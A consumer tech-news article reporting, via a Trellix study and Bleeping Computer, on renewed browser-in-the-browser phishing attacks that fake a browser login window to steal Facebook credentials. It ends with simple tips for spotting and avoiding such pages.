Facebook may feel like a digital retirement home these days, but it remains a prime target for hackers—and a particularly sneaky phishing technique is making the rounds again. Security researchers are warning about a resurgence of so-called browser-in-the-browser (BITB) attacks, with Facebook users squarely in the crosshairs.
A browser-in-the-browser attack takes a familiar phishing trick and upgrades it with deception layered on top of deception. Instead of simply sending users to a fake login page, attackers create an entire fake browser window inside a webpage. That includes a convincing address bar, security icons, and a URL that looks perfectly legitimate at first glance. The result is a login page that appears to be loaded inside a real browser window—even though everything you’re seeing is fake.
According to a new report from security firm Trellix, these attacks are increasingly being used against Facebook accounts. The bait usually arrives via spam emails or text messages claiming there’s a security issue, suspicious activity, or an account problem that needs immediate attention. Clicking the link opens a custom-crafted page that uses the BITB trick, sometimes complete with a CAPTCHA to lower suspicion, followed by a realistic Facebook login prompt designed to harvest usernames and passwords.
Facebook’s enormous user base makes it an especially attractive target. With billions of active users worldwide, many of whom are not particularly security-conscious, attackers have a large pool of potential victims. The danger doesn’t stop at a stolen Facebook account, either—password reuse means a single successful phishing attempt can open the door to email accounts, financial services, and identity theft.
As Bleeping Computer points out, there are still ways to spot a BITB attack if you know what to look for. One simple test is to try dragging the browser window’s title bar; if it won’t move, that’s a red flag. More broadly, avoiding login links altogether remains one of the safest practices. If an email claims there’s a problem with an account, opening a fresh browser window and logging in directly—rather than clicking the link—can quickly reveal whether the warning is real or just another well-disguised scam.
